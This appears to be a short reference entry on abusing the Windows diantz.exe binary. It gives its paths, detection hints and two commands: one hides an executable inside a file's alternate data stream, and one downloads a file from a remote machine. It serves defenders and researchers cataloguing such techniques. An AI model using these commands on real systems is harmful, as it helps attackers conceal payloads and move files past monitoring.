~/ cat Diantz.exe.md █
Binary that package existing files into a cabinet (.cab) file
Paths:
c:\windows\system32\diantz.exe
c:\windows\syswow64\diantz.exe
Detection: diantz storing data into alternate data streams. diantz getting a file from a remote machine or the internet.
Alternate data streams
Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Download
Download and compress a remote file and store it in a cab file on local machine.
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab